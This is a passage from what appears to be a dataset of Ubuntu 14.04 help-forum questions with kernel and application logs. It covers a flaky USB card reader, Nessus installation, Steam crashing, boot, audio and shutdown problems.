1-1.2:1.0 [ 708.477213 ] usbcore : registered new interface driver ums-realtek [ 709.475917 ] scsi 4:0:0:0 : direct-access generic- multi-card 1.00 pq : 0 ansi : 0 ccs [ 709.477769 ] sd 4:0:0:0 : attached scsi generic sg2 type 0 [ 710.131709 ] sd 4:0:0:0 : [ sdb ] 3862528 512-byte logical blocks : ( 1.97 gb/1.84 gib ) [ 710.132653 ] sd 4:0:0:0 : [ sdb ] write protect is off [ 710.132660 ] sd 4:0:0:0 : [ sdb ] mode sense : 03 00 00 00 [ 710.133694 ] sd 4:0:0:0 : [ sdb ] no caching mode page found [ 710.133703 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 710.137908 ] sd 4:0:0:0 : [ sdb ] no caching mode page found [ 710.137916 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 710.140549 ] sdb : [ 710.143263 ] sd 4:0:0:0 : [ sdb ] no caching mode page found [ 710.143273 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 710.143282 ] sd 4:0:0:0 : [ sdb ] attached scsi removable disk [ 711.981919 ] ieee80211 phy0 : start : tid 1 is not agg'able [ 758.520811 ] ieee80211 phy0 : start : tid 1 is not agg'able [ 803.770458 ] ieee80211 phy0 : start : tid 1 is not agg'able [ 864.246875 ] usb 1-1.2 : usb disconnect , device number 8 [ 868.352881 ] usb 1-1.2 : new high-speed usb device number 9 using ehci_hcd [ 869.076446 ] usb 1-1.2 : device not accepting address 9 , error -71 [ 869.093016 ] hub 1-1:1.0 : unable to enumerate usb device on port 2 [ 869.292653 ] usb 1-1.2 : new high-speed usb device number 11 using ehci_hcd [ 869.320734 ] hub 1-1:1.0 : unable to enumerate usb device on port 2 [ 869.520610 ] usb 1-1.2 : new high-speed usb device number 12 using ehci_hcd [ 869.711736 ] usb 1-1.2 : new usb device found , idvendor=0bda , idproduct=0159 [ 869.711741 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 869.711745 ] usb 1-1.2 : product : usb2.0-crw [ 869.711748 ] usb 1-1.2 : manufacturer : generic [ 869.711752 ] usb 1-1.2 : serialnumber : 20071114173400000 [ 869.727659 ] scsi5 : usb-storage 1-1.2:1.0 [ 870.298259 ] usb 1-1.2 : usb disconnect , device number 12 [ 870.528192 ] usb 1-1.2 : new high-speed usb device number 13 using ehci_hcd [ 870.556400 ] hub 1-1:1.0 : unable to enumerate usb device on port 2 [ 870.852071 ] usb 1-1.2 : new high-speed usb device number 14 using ehci_hcd [ 870.955243 ] usb 1-1.2 : new usb device found , idvendor=0bda , idproduct=0159 [ 870.955255 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 870.955264 ] usb 1-1.2 : product : usb2.0-crw [ 870.955270 ] usb 1-1.2 : manufacturer : generic [ 870.955275 ] usb 1-1.2 : serialnumber : 20071114173400000 [ 870.972619 ] scsi6 : usb-storage 1-1.2:1.0 [ 871.321878 ] usb 1-1.2 : usb disconnect , device number 14 [ 871.519682 ] usb 1-1.2 : new high-speed usb device number 15 using ehci_hcd [ 871.864317 ] usb 1-1.2 : new usb device found , idvendor=0bda , idproduct=0159 [ 871.864323 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 871.864327 ] usb 1-1.2 : product : usb2.0-crw [ 871.864331 ] usb 1-1.2 : manufacturer : generic [ 871.864334 ] usb 1-1.2 : serialnumber : 20071114173400000 [ 871.880379 ] scsi7 : usb-storage 1-1.2:1.0 [ 872.881868 ] scsi 7:0:0:0 : direct-access generic- multi-card 1.00 pq : 0 ansi : 0 ccs [ 872.883394 ] sd 7:0:0:0 : attached scsi generic sg2 type 0 [ 873.537359 ] sd 7:0:0:0 : [ sdb ] 3862528 512-byte logical blocks : ( 1.97 gb/1.84 gib ) [ 873.538175 ] sd 7:0:0:0 : [ sdb ] write protect is off [ 873.538182 ] sd 7:0:0:0 : [ sdb ] mode sense : 03 00 00 00 [ 873.539099 ] sd 7:0:0:0 : [ sdb ] no caching mode page found [ 873.539107 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 873.543066 ] sd 7:0:0:0 : [ sdb ] no caching mode page found [ 873.543074 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 873.545698 ] sdb : [ 873.548954 ] sd 7:0:0:0 : [ sdb ] no caching mode page found [ 873.548964 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 873.548973 ] sd 7:0:0:0 : [ sdb ] attached scsi removable disk [ 874.904666 ] usb 1-1.2 : usb disconnect , device number 15 [ 875.138300 ] usb 1-1.2 : new high-speed usb device number 16 using ehci_hcd [ 875.377589 ] usb 1-1.2 : new usb device found , idvendor=0bda , idproduct=0159 [ 875.377597 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 875.377602 ] usb 1-1.2 : product : usb2.0-crw [ 875.377606 ] usb 1-1.2 : manufacturer : generic [ 875.377611 ] usb 1-1.2 : serialnumber : 20071114173400000 [ 875.395620 ] scsi8 : usb-storage 1-1.2:1.0 [ 876.396676 ] scsi 8:0:0:0 : direct-access generic- multi-card 1.00 pq : 0 ansi : 0 ccs [ 876.398308 ] sd 8:0:0:0 : attached scsi generic sg2 type 0 [ 877.050200 ] sd 8:0:0:0 : [ sdb ] 3862528 512-byte logical blocks : ( 1.97 gb/1.84 gib ) [ 877.050941 ] sd 8:0:0:0 : [ sdb ] write protect is off [ 877.050944 ] sd 8:0:0:0 : [ sdb ] mode sense : 03 00 00 00 [ 877.051688 ] sd 8:0:0:0 : [ sdb ] no caching mode page found [ 877.051692 ] sd 8:0:0:0 : [ sdb ] assuming drive cache : write through [ 877.055466 ] sd 8:0:0:0 : [ sdb ] no caching mode page found [ 877.055474 ] sd 8:0:0:0 : [ sdb ] assuming drive cache : write through [ 877.057980 ] sdb : [ 877.060539 ] sd 8:0:0:0 : [ sdb ] no caching mode page found [ 877.060543 ] sd 8:0:0:0 : [ sdb ] assuming drive cache : write through [ 877.060547 ] sd 8:0:0:0 : [ sdb ] attached scsi removable disk [ 881.302111 ] usb 1-1.2 : usb disconnect , device number 16 [ 881.503917 ] usb 1-1.2 : new high-speed usb device number 17 using ehci_hcd [ 881.532168 ] hub 1-1:1.0 : unable to enumerate usb device on port 2 [ 882.011722 ] usb 1-1.2 : new high-speed usb device number 18 using ehci_hcd [ 882.357797 ] usb 1-1.2 : new usb device found , idvendor=0bda , idproduct=0159 [ 882.357809 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 882.357818 ] usb 1-1.2 : product : usb2.0-crw [ 882.357825 ] usb 1-1.2 : manufacturer : generic [ 882.357833 ] usb 1-1.2 : serialnumber : 20071114173400000 [ 882.374033 ] scsi9 : usb-storage 1-1.2:1.0 [ 882.581646 ] usb 1-1.2 : usb disconnect , device number 18 [ 882.811432 ] usb 1-1.2 : new high-speed usb device number 19 using ehci_hcd [ 882.914521 ] usb 1-1.2 : new usb device found , idvendor=0bda , idproduct=0159 [ 882.914531 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 882.914537 ] usb 1-1.2 : product : usb2.0-crw [ 882.914542 ] usb 1-1.2 : manufacturer : generic [ 882.914547 ] usb 1-1.2 : serialnumber : 20071114173400000 [ 882.930544 ] scsi10 : usb-storage 1-1.2:1.0 [ 883.929510 ] scsi 10:0:0:0 : direct-access generic- multi-card 1.00 pq : 0 ansi : 0 ccs [ 883.931691 ] sd 10:0:0:0 : attached scsi generic sg2 type 0 [ 884.587645 ] sd 10:0:0:0 : [ sdb ] 3862528 512-byte logical blocks : ( 1.97 gb/1.84 gib ) [ 884.588629 ] sd 10:0:0:0 : [ sdb ] write protect is off [ 884.588638 ] sd 10:0:0:0 : [ sdb ] mode sense : 03 00 00 00 [ 884.589669 ] sd 10:0:0:0 : [ sdb ] no caching mode page found [ 884.589676 ] sd 10:0:0:0 : [ sdb ] assuming drive cache : write through [ 884.593775 ] sd 10:0:0:0 : [ sdb ] no caching mode page found [ 884.593783 ] sd 10:0:0:0 : [ sdb ] assuming drive cache : write through [ 884.596418 ] sdb : [ 884.599118 ] sd 10:0:0:0 : [ sdb ] no caching mode page found [ 884.599128 ] sd 10:0:0:0 : [ sdb ] assuming drive cache : write through [ 884.599137 ] sd 10:0:0:0 : [ sdb ] attached scsi removable disk [ 903.309949 ] usb 1-1.2 : usb disconnect , device number 19 [ 903.607560 ] usb 1-1.2 : new high-speed usb device number 20 using ehci_hcd [ 903.710767 ] usb 1-1.2 : new usb device found , idvendor=0bda , idproduct=0159 [ 903.710776 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 903.710782 ] usb 1-1.2 : product : usb2.0-crw [ 903.710787 ] usb 1-1.2 : manufacturer : generic [ 903.710792 ] usb 1-1.2 : serialnumber : 20071114173400000 [ 903.727273 ] scsi11 : usb-storage 1-1.2:1.0 [ 904.729854 ] scsi 11:0:0:0 : direct-access generic- multi-card 1.00 pq : 0 ansi : 0 ccs [ 904.731947 ] sd 11:0:0:0 : attached scsi generic sg2 type 0 [ 905.383762 ] sd 11:0:0:0 : [ sdb ] 3862528 512-byte logical blocks : ( 1.97 gb/1.84 gib ) [ 905.384680 ] sd 11:0:0:0 : [ sdb ] write protect is off [ 905.384689 ] sd 11:0:0:0 : [ sdb ] mode sense : 03 00 00 00 [ 905.385534 ] sd 11:0:0:0 : [ sdb ] no caching mode page found [ 905.385541 ] sd 11:0:0:0 : [ sdb ] assuming drive cache : write through [ 905.389363 ] sd 11:0:0:0 : [ sdb ] no caching mode page found [ 905.389370 ] sd 11:0:0:0 : [ sdb ] assuming drive cache : write through [ 905.392128 ] sdb : [ 905.395004 ] sd 11:0:0:0 : [ sdb ] no caching mode page found [ 905.395013 ] sd 11:0:0:0 : [ sdb ] assuming drive cache : write through [ 905.395022 ] sd 11:0:0:0 : [ sdb ] attached scsi removable disk [ 910.475095 ] usb 1-1.2 : usb disconnect , device number 20 [ 910.676778 ] usb 1-1.2 : new high-speed usb device number 21 using ehci_hcd [ 910.780962 ] usb 1-1.2 : device descriptor read/all , error -71 [ 910.797126 ] hub 1-1:1.0 : unable to enumerate usb device on port 2 [ 911.060764 ] usb 1-1.2 : new high-speed usb device number 23 using ehci_hcd [ 911.164100 ] usb 1-1.2 : new usb device found , idvendor=0bda , idproduct=0159 [ 911.164105 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 911.164109 ] usb 1-1.2 : product : usb2.0-crw [ 911.164112 ] usb 1-1.2 : manufacturer : generic [ 911.164115 ] usb 1-1.2 : serialnumber : 20071114173400000 [ 911.180142 ] scsi12 : usb-storage 1-1.2:1.0 [ 912.178906 ] scsi 12:0:0:0 : direct-access generic- multi-card 1.00 pq : 0 ansi : 0 ccs [ 912.180483 ] sd 12:0:0:0 : attached scsi generic sg2 type 0 [ 912.971100 ] sd 12:0:0:0 : [ sdb ] 3862528 512-byte logical blocks : ( 1.97 gb/1.84 gib ) [ 912.971950 ] sd 12:0:0:0 : [ sdb ] write protect is off [ 912.971958 ] sd 12:0:0:0 : [ sdb ] mode sense : 03 00 00 00 [ 912.972797 ] sd 12:0:0:0 : [ sdb ] no caching mode page found [ 912.972806 ] sd 12:0:0:0 : [ sdb ] assuming drive cache : write through [ 912.976876 ] sd 12:0:0:0 : [ sdb ] no caching mode page found [ 912.976883 ] sd 12:0:0:0 : [ sdb ] assuming drive cache : write through [ 912.979529 ] sdb : [ 912.982396 ] sd 12:0:0:0 : [ sdb ] no caching mode page found [ 912.982404 ] sd 12:0:0:0 : [ sdb ] assuming drive cache : write through [ 912.982410 ] sd 12:0:0:0 : [ sdb ] attached scsi removable disk [ 913.545862 ] usb 1-1.2 : usb disconnect , device number 23 [ 913.603007 ] fat-fs ( sdb ) : directory bread ( block 480 ) failed [ 913.603014 ] fat-fs ( sdb ) : directory bread ( block 481 ) failed [ 913.603017 ] fat-fs ( sdb ) : directory bread ( block 482 ) failed [ 913.603020 ] fat-fs ( sdb ) : directory bread ( block 483 ) failed [ 913.603022 ] fat-fs ( sdb ) : directory bread ( block 484 ) failed [ 913.603025 ] fat-fs ( sdb ) : directory bread ( block 485 ) failed [ 913.603028 ] fat-fs ( sdb ) : directory bread ( block 486 ) failed [ 913.603031 ] fat-fs ( sdb ) : directory bread ( block 487 ) failed [ 913.603039 ] fat-fs ( sdb ) : directory bread ( block 488 ) failed [ 913.603041 ] fat-fs ( sdb ) : directory bread ( block 489 ) failed [ 913.751579 ] usb 1-1.2 : new high-speed usb device number 24 using ehci_hcd [ 913.854799 ] usb 1-1.2 : new usb device found , idvendor=0bda , idproduct=0159 [ 913.854809 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 913.854815 ] usb 1-1.2 : product : usb2.0-crw [ 913.854820 ] usb 1-1.2 : manufacturer : generic [ 913.854825 ] usb 1-1.2 : serialnumber : 20071114173400000 [ 913.870512 ] scsi13 : usb-storage 1-1.2:1.0 [ 914.870204 ] scsi 13:0:0:0 : direct-access generic- multi-card 1.00 pq : 0 ansi : 0 ccs [ 914.871962 ] sd 13:0:0:0 : attached scsi generic sg2 type 0 [ 915.527587 ] sd 13:0:0:0 : [ sdb ] 3862528 512-byte logical blocks : ( 1.97 gb/1.84 gib ) [ 915.528573 ] sd 13:0:0:0 : [ sdb ] write protect is off [ 915.528580 ] sd 13:0:0:0 : [ sdb ] mode sense : 03 00 00 00 [ 915.529465 ] sd 13:0:0:0 : [ sdb ] no caching mode page found [ 915.529472 ] sd 13:0:0:0 : [ sdb ] assuming drive cache : write through [ 915.533706 ] sd 13:0:0:0 : [ sdb ] no caching mode page found [ 915.533714 ] sd 13:0:0:0 : [ sdb ] assuming drive cache : write through [ 915.536351 ] sdb : [ 915.538993 ] sd 13:0:0:0 : [ sdb ] no caching mode page found [ 915.539003 ] sd 13:0:0:0 : [ sdb ] assuming drive cache : write through [ 915.539011 ] sd 13:0:0:0 : [ sdb ] attached scsi removable disk [ 917.128586 ] usb 1-1.2 : usb disconnect , device number 24 [ 917.330211 ] usb 1-1.2 : new high-speed usb device number 25 using ehci_hcd [ 917.433880 ] usb 1-1.2 : new usb device found , idvendor=0bda , idproduct=0159 [ 917.433889 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 917.433895 ] usb 1-1.2 : product : usb2.0-crw [ 917.433901 ] usb 1-1.2 : manufacturer : generic [ 917.433905 ] usb 1-1.2 : serialnumber : 20071114173400000 [ 917.450314 ] scsi14 : usb-storage 1-1.2:1.0 [ 918.152346 ] usb 1-1.2 : usb disconnect , device number 25 [ 918.413983 ] usb 1-1.2 : new high-speed usb device number 26 using ehci_hcd [ 918.517339 ] usb 1-1.2 : new usb device found , idvendor=0bda , idproduct=0159 [ 918.517348 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 918.517354 ] usb 1-1.2 : product : usb2.0-crw [ 918.517359 ] usb 1-1.2 : manufacturer : generic [ 918.517364 ] usb 1-1.2 : serialnumber : 20071114173400000 [ 918.533915 ] scsi15 : usb-storage 1-1.2:1.0 [ 919.536259 ] scsi 15:0:0:0 : direct-access generic- multi-card 1.00 pq : 0 ansi : 0 ccs [ 919.537814 ] sd 15:0:0:0 : attached scsi generic sg2 type 0 [ 920.189983 ] sd 15:0:0:0 : [ sdb ] 3862528 512-byte logical blocks : ( 1.97 gb/1.84 gib ) [ 920.190811 ] sd 15:0:0:0 : [ sdb ] write protect is off [ 920.190821 ] sd 15:0:0:0 : [ sdb ] mode sense : 03 00 00 00 [ 920.191861 ] sd 15:0:0:0 : [ sdb ] no caching mode page found [ 920.191868 ] sd 15:0:0:0 : [ sdb ] assuming drive cache : write through [ 920.195942 ] sd 15:0:0:0 : [ sdb ] no caching mode page found [ 920.195949 ] sd 15:0:0:0 : [ sdb ] assuming drive cache : write through [ 920.198574 ] sdb : [ 920.201426 ] sd 15:0:0:0 : [ sdb ] no caching mode page found [ 920.201434 ] sd 15:0:0:0 : [ sdb ] assuming drive cache : write through [ 920.201440 ] sd 15:0:0:0 : [ sdb ] attached scsi removable disk [ 932.994597 ] usb 1-1.2 : usb disconnect , device number 26 [ 933.196287 ] usb 1-1.2 : new high-speed usb device number 27 using ehci_hcd [ 933.299609 ] usb 1-1.2 : new usb device found , idvendor=0bda , idproduct=0159 [ 933.299615 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 933.299619 ] usb 1-1.2 : product : usb2.0-crw [ 933.299622 ] usb 1-1.2 : manufacturer : generic [ 933.299625 ] usb 1-1.2 : serialnumber : 20071114173400000 [ 933.339045 ] scsi16 : usb-storage 1-1.2:1.0 [ 933.506400 ] usb 1-1.2 : usb disconnect , device number 27 [ 933.704217 ] usb 1-1.2 : new high-speed usb device number 28 using ehci_hcd [ 933.732609 ] hub 1-1:1.0 : unable to enumerate usb device on port 2 [ 934.088091 ] usb 1-1.2 : new high-speed usb device number 29 using ehci_hcd [ 934.434187 ] usb 1-1.2 : new usb device found , idvendor=0bda , idproduct=0159 [ 934.434193 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 934.434197 ] usb 1-1.2 : product : usb2.0-crw [ 934.434200 ] usb 1-1.2 : manufacturer : generic [ 934.434204 ] usb 1-1.2 : serialnumber : 20071114173400000 [ 934.450163 ] scsi17 : usb-storage 1-1.2:1.0 [ 935.449929 ] scsi 17:0:0:0 : direct-access generic- multi-card 1.00 pq : 0 ansi : 0 ccs [ 935.450619 ] sd 17:0:0:0 : attached scsi generic sg2 type 0 [ 936.106902 ] sd 17:0:0:0 : [ sdb ] 3862528 512-byte logical blocks : ( 1.97 gb/1.84 gib ) [ 936.107769 ] sd 17:0:0:0 : [ sdb ] write protect is off [ 936.107772 ] sd 17:0:0:0 : [ sdb ] mode sense : 03 00 00 00 [ 936.108514 ] sd 17:0:0:0 : [ sdb ] no caching mode page found [ 936.108517 ] sd 17:0:0:0 : [ sdb ] assuming drive cache : write through [ 936.111920 ] sd 17:0:0:0 : [ sdb ] no caching mode page found [ 936.111927 ] sd 17:0:0:0 : [ sdb ] assuming drive cache : write through [ 936.114566 ] sdb : [ 936.120989 ] sd 17:0:0:0 : [ sdb ] no caching mode page found [ 936.120995 ] sd 17:0:0:0 : [ sdb ] assuming drive cache : write through [ 936.120998 ] sd 17:0:0:0 : [ sdb ] attached scsi removable disk [ 939.903949 ] usb 1-1.2 : usb disconnect , device number 29 [ 940.357576 ] usb 1-1.2 : new high-speed usb device number 30 using ehci_hcd [ 940.548747 ] usb 1-1.2 : new usb device found , idvendor=0bda , idproduct=0159 [ 940.548753 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 940.548757 ] usb 1-1.2 : product : usb2.0-crw [ 940.548760 ] usb 1-1.2 : manufacturer : generic [ 940.548763 ] usb 1-1.2 : serialnumber : 20071114173400000 [ 940.564895 ] scsi18 : usb-storage 1-1.2:1.0 [ 941.563859 ] scsi 18:0:0:0 : direct-access generic- multi-card 1.00 pq : 0 ansi : 0 ccs [ 941.565702 ] sd 18:0:0:0 : attached scsi generic sg2 type 0 [ 942.221437 ] sd 18:0:0:0 : [ sdb ] 3862528 512-byte logical blocks : ( 1.97 gb/1.84 gib ) [ 942.222225 ] sd 18:0:0:0 : [ sdb ] write protect is off [ 942.222234 ] sd 18:0:0:0 : [ sdb ] mode sense : 03 00 00 00 [ 942.223081 ] sd 18:0:0:0 : [ sdb ] no caching mode page found [ 942.223090 ] sd 18:0:0:0 : [ sdb ] assuming drive cache : write through [ 942.227301 ] sd 18:0:0:0 : [ sdb ] no caching mode page found [ 942.227307 ] sd 18:0:0:0 : [ sdb ] assuming drive cache : write through [ 942.229878 ] sdb : [ 942.232467 ] sd 18:0:0:0 : [ sdb ] no caching mode page found [ 942.232478 ] sd 18:0:0:0 : [ sdb ] assuming drive cache : write through [ 942.232488 ] sd 18:0:0:0 : [ sdb ] attached scsi removable disk [ 946.465135 ] ieee80211 phy0 : start : tid 1 is not agg'able [ 949.372674 ] usb 1-1.2 : usb disconnect , device number 30 [ 949.574100 ] usb 1-1.2 : new high-speed usb device number 31 using ehci_hcd [ 950.061699 ] usb 1-1.2 : device not accepting address 31 , error -71 [ 950.078446 ] hub 1-1:1.0 : unable to enumerate usb device on port 2 [ 950.277818 ] usb 1-1.2 : new high-speed usb device number 33 using ehci_hcd [ 950.306029 ] hub 1-1:1.0 : unable to enumerate usb device on port 2 [ 950.593773 ] usb 1-1.2 : new high-speed usb device number 34 using ehci_hcd [ 950.939790 ] usb 1-1.2 : new usb device found , idvendor=0bda , idproduct=0159 [ 950.939794 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 950.939797 ] usb 1-1.2 : product : usb2.0-crw [ 950.939799 ] usb 1-1.2 : manufacturer : generic [ 950.939801 ] usb 1-1.2 : serialnumber : 20071114173400000 [ 950.955354 ] scsi19 : usb-storage 1-1.2:1.0 [ 951.955469 ] scsi 19:0:0:0 : direct-access generic- multi-card 1.00 pq : 0 ansi : 0 ccs [ 951.957130 ] sd 19:0:0:0 : attached scsi generic sg2 type 0 [ 952.612802 ] sd 19:0:0:0 : [ sdb ] 3862528 512-byte logical blocks : ( 1.97 gb/1.84 gib ) [ 952.613507 ] sd 19:0:0:0 : [ sdb ] write protect is off [ 952.613511 ] sd 19:0:0:0 : [ sdb ] mode sense : 03 00 00 00 [ 952.614258 ] sd 19:0:0:0 : [ sdb ] no caching mode page found [ 952.614262 ] sd 19:0:0:0 : [ sdb ] assuming drive cache : write through [ 952.619391 ] sd 19:0:0:0 : [ sdb ] no caching mode page found [ 952.619397 ] sd 19:0:0:0 : [ sdb ] assuming drive cache : write through [ 952.621895 ] sdb : [ 952.625756 ] sd 19:0:0:0 : [ sdb ] no caching mode page found [ 952.625761 ] sd 19:0:0:0 : [ sdb ] assuming drive cache : write through [ 952.625765 ] sd 19:0:0:0 : [ sdb ] attached scsi removable disk any help ? sometimes when it doesnt see , it writes such error in dmesg : [ 1373.209390 ] usb 1-1.2 : new high-speed usb device number 37 using ehci_hcd [ 1373.860861 ] usb 1-1.2 : device not accepting address 37 , error -71 [ 1373.877631 ] hub 1-1:1.0 : unable to enumerate usb device on port 2
472599	ca n't install nessus in ubuntu 14.04 lts	i tried with the following command : sudo apt-get install nessus but it shows : reading package lists ... done building dependency tree reading state information ... done package nessus is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : openvas-client : i386 openvas-client e : package 'nessus ' has no installation candidate what to do now ?
472600	steam problem , closes automatic ?	i installed steam , i can start it , but after a few seconds it closes without any errors . what can i do to fix ? when starting with a terminal : mark @ team-korkel : ~ $ steam rm : kan ‘/home/mark/.steam/steam’ niet verwijderen : is een map rm : kan ‘/home/mark/.steam/bin’ niet verwijderen : is een map running steam on ubuntu 14.04 64-bit steam_runtime is enabled automatically [ 2014-05-27 15:27:50 ] startup - updater built may 20 2014 18:30:56 installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) looks like steam did n't shutdown cleanly , scheduling immediate update check installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) [ 2014-05-27 15:27:50 ] checking for update on startup [ 2014-05-27 15:27:50 ] checking for available updates ... installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) [ 2014-05-27 15:27:51 ] download skipped : /client/steam_client_ubuntu12 version 1400690891 , installed version 1400690891 [ 2014-05-27 15:27:51 ] nothing to do [ 2014-05-27 15:27:51 ] verifying installation ... [ 2014-05-27 15:27:51 ] performing checksum verification of executable files [ 2014-05-27 15:27:51 ] verification complete gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig warning : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 78 : saw unknown , expected number [ 0527/152752 : warning : proxy_service.cc ( 958 ) ] pac support disabled because there is no system implementation installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) [ http remote control ] http server listening on port 41912 . installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) generating new string page texture 2 : 48x256 , total string texture memory is 49,15 kb generating new string page texture 3 : 256x256 , total string texture memory is 311,30 kb installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) local ( potentially out of sync ) copy of roaming config loaded - 226 bytes . installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) adding licenses for the following package ( s ) : 0 roaming config store loaded successfully - 226 bytes . migrating temporary roaming config store installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) execcommandline : `` /home/mark/.steam/ubuntu12_32/steam '' system startup time : 15,86 seconds running steam on ubuntu 14.04 64-bit steam_runtime has been set by the user to : /home/mark/.steam/ubuntu12_32/steam-runtime generating new string page texture 70 : 128x256 , total string texture memory is 442,37 kb generating new string page texture 71 : 128x256 , total string texture memory is 131,07 kb generating new string page texture 72 : 64x256 , total string texture memory is 507,90 kb generating new string page texture 73 : 32x256 , total string texture memory is 540,67 kb execcommandline : `` /home/mark/.steam/root/ubuntu12_32/steam steam : //open/driverhelperready '' execsteamurl : `` steam : //open/driverhelperready '' installing breakpad exception handler for appid ( steam ) /version ( 1400690891_client ) generating new string page texture 80 : 8x256 , total string texture memory is 548,86 kb [ 0527/152809 : warning : backend_impl.cc ( 1930 ) ] destroying invalid entry . [ 0527/152809 : warning : backend_impl.cc ( 1930 ) ] destroying invalid entry . [ 0527/152809 : warning : backend_impl.cc ( 1930 ) ] destroying invalid entry . [ 0527/152809 : warning : backend_impl.cc ( 1930 ) ] destroying invalid entry . [ 0527/152809 : warning : backend_impl.cc ( 1930 ) ] destroying invalid entry . [ 0527/152809 : warning : backend_impl.cc ( 1930 ) ] destroying invalid entry . [ 0527/152809 : warning : backend_impl.cc ( 1930 ) ] destroying invalid entry . [ 0527/152809 : warning : backend_impl.cc ( 1930 ) ] destroying invalid entry . [ 0527/152809 : warning : backend_impl.cc ( 1930 ) ] destroying invalid entry . [ 0527/152809 : warning : backend_impl.cc ( 1930 ) ] destroying invalid entry . [ 0527/152809 : warning : backend_impl.cc ( 1930 ) ] destroying invalid entry . [ 0527/152809 : warning : backend_impl.cc ( 1930 ) ] destroying invalid entry . [ 0527/152809 : warning : backend_impl.cc ( 1930 ) ] destroying invalid entry . using 14.04 64 bit system .
472601	14.04 boot failure on installation from usb	i bought a new hp pc ( details below ) intending to replace w8.1 with ubuntu . boot failed with both 12.04 lts and 14.04lts . the details below are pretty much the same for both . the system gets as far as rebooting into 14.04 after installation from .iso image on usb disk . i am running grub 2.02~beta 2.9 . ubuntu is supposed to install successfully . when you start up ( without usb disk present ) , it offers a grey screen with a purple border 10-20px wide all the way round . it then puts up a tty screen with the login , then after a while comes up with : '' your screen graphics and input device settings could not be detected correctly . you will need to configure them yourself . '' hit it then says `` what would you like to do ? '' and offers a menu list the first of which is : '' * run in low graphics mode for just one session . '' there are a list of other options , but these are greyed out . hit ... . system freezes ( no movement after 15 mins or so . looks like grub/ubuntu ca n't recognise any i/o devices . it should be happy with the radeon graphics should n't it . i believe that the touchpad is standard too . how can i sort this ? ? tia btw before anyone suggests h/w failure it runs w8.1 just fine : - ( - if you like that sort of thing . it bombed on mint16 , too . system details : hp pavilion notebook amd a10-5745mapu + radeon graphics + 8gb + 1tb disk bios is insyde f.13 ( insyde h20 setup utility r3.7 ) i have got uefi running because 14.04 is supposed to be able to handle it . legacy boot is disabled . the grub partition is at about 1 mb , the main partition is about 800 gb and the swap is about 17.8gb
472606	sound devices detected but audio is n't working	i have a fresh installation of ubuntu 14.04 on a system with two detected audio devices ( specifically , an hp envy 810-160 ) , but the sound for the system is n't working properly . from what i can see in the pulseaudio volume control application , my default device ( hda intel pch ) is receiving the sound , but this sound is n't being output through my headphones . my current audio configuration can be found here ( which was retrieved using the alsa-info.sh script ) . please let me know if any other information would be helpful ( i 'll post more images and references once i have the appropriate reputation level ) and thanks in advance for your help .
472613	will not shut down 14.04	gets stuck on splash image sudo shutdown -h now - does n't work sudo shutdown -r 0 - reboots system running 14.04 lts on hp 250 / intel core i3-3110m cpu @ 2.40ghz ă 4 i 've seen this question asked already so sorry for repeating but where can i follow whats going on with this bug ? tried the shutdowm -p now , heres the log - command=/sbin/shutdown -p now may 27 18:42:37 ted sudo : pam_unix ( sudo : session ) : session opened for user root by dee ( uid=0 ) may 27 18:42:37 ted sudo : pam_unix ( sudo : session ) : session closed for user root may 27 18:43:51 ted systemd-logind [ 739 ] : new seat seat0 . may 27 18:43:51 ted systemd-logind [ 739 ] : watching system buttons on /dev/input/event2 ( power button ) may 27 18:43:51 ted systemd-logind [ 739 ] : watching system buttons on /dev/input/event7 ( video bus ) may 27 18:43:51 ted systemd-logind [ 739 ] : watching system buttons on /dev/input/event1 ( power button ) may 27 18:43:51 ted systemd-logind [ 739 ] : watching system buttons on /dev/input/event0 ( lid switch ) may 27 18:43:54 ted lightdm : pam unable to dlopen ( pam_kwallet.so ) : 